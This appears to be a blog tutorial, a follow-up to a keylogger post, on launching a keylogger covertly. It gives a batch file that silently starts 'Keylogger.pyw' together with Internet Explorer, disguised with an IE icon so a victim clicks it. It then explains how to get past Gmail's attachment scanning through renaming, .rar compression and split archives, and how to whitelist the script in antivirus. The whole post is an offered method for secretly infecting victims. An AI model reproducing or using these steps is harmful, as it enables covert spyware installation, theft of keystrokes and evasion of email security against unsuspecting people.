How to launch a program without knowing user about that launching?
Here’s a tip for launching a program or any .exe file without knowing user that it is launched. Ok , here we will assume that malicious software be Keylogger that we have created in the last post . if u don't know about that then check out this link Simple Python Keylogger..
One way to do that is to attach the .exe pragram to the user favourate program..Here's How
let the user use Internet Explorer constantly. I know it is hard to belive but that is a hythatatical situation.
open up a Notepad and create a batch file that launch our both python program and the internet explorer . when click
To do this . type in the below code in Notepad
start "C:\imp\Keylogger.pyw"
start "C:\Program Files\Internet Explorer\iexplorer.exe"
to make it invisible make sure to write @echo off at the top and start with empty quotes before the each line code as shown below.
@echo off
start " " "C:\imp\Keylogger.pyw"
start " " "C:\Program Files\Internet Explorer\iexplorer.exe"
look at fig 2 if you have any issues.
fig.2 |
Now, Internet Explorer.bat file will be create where you have given the path and saved
change the Icon of the .bat file to Iexplorer or some thing that you think that user most chance to Click on it. Or if you want send to your victim by Mail you can do this as shown below.
Note:
This is an executable file. For security reasons, Gmail does not allow you to send this type of file.
Why Batch file are not allowed in Gmail ?
When you send and receive attachments with GMail, they're auto scanned
for viruses. If Gmail thinks your mail has viruses, it will attempt to
clean the file or remove it. But if it detects a virus and can't remove
it, then you won't be able to download it.
Thanks to the new GMail Anti Virus Scanner, you cannot send or receive emails with exe, dll, ocx, com or bat attachments even if they are sent in a zipped (.zip, .tar, .tgz, .taz, .z, .gz) format (The .rar format is still allowed).
Since you cannot Turn Off GMail Anti Virus Scanning, you can use these GMail hacks to send program file , virus samples and other blocked formats with GMail. here's how
Thanks to the new GMail Anti Virus Scanner, you cannot send or receive emails with exe, dll, ocx, com or bat attachments even if they are sent in a zipped (.zip, .tar, .tgz, .taz, .z, .gz) format (The .rar format is still allowed).
Since you cannot Turn Off GMail Anti Virus Scanning, you can use these GMail hacks to send program file , virus samples and other blocked formats with GMail. here's how
Create a New folder and Rename it as you want.
Drag and Drop all the program that you want to send into your folder.
Now, Create a shortcut of the Batch file
select the Batch file >> Left Click>> Create Shortcut
as show in the above fig.3
Now, hide those program that you don't to show the victim.
fig.4 |
You can change the icon to your tastes what you will have to do is
find a .png a png file is an icon file. Anyways just save it to the
drive name it drive.ico next time you Browse the drive out and put it in
you will have your custom icon. as show below
Select the Shortcut>>Click on Properties>>Change Icon>>Browse or select one from specified
Then click on Ok>>Apply.>>Ok
Now, the Icon will be changed .
look at fig. if you have any issues.
fig.5 |
Rename the file: Change the file extension to fool the GMail scanner. and the Victim User The new attachment could contain only Shortcut to the Hide program making it easier for the
recepient to derive the actuall attachment type.,for instance
Rename Internet Explorer.bat to Internet Explorer
And the last thing to do this is Compress to .rar etc. and attach to your Mail and Send
Use a different compression software like WinRAR which compresses files
in .rar format. GMail is currently not scanning or blocking .rar
filetypes. But there is a high probability that GMail might support rar
formats in future. In that case, you can consider splitting the rar
files and attaching them separately (like .r1, .r2..)
Note:
I noticed when I ran this script the antivirus alerted me that a .bat script was about to run. You will need to add the script to the ignore/authenticated list within your program
Still then Like our Facebook Page and wait still our next post .Thank you
0 comments:
Post a Comment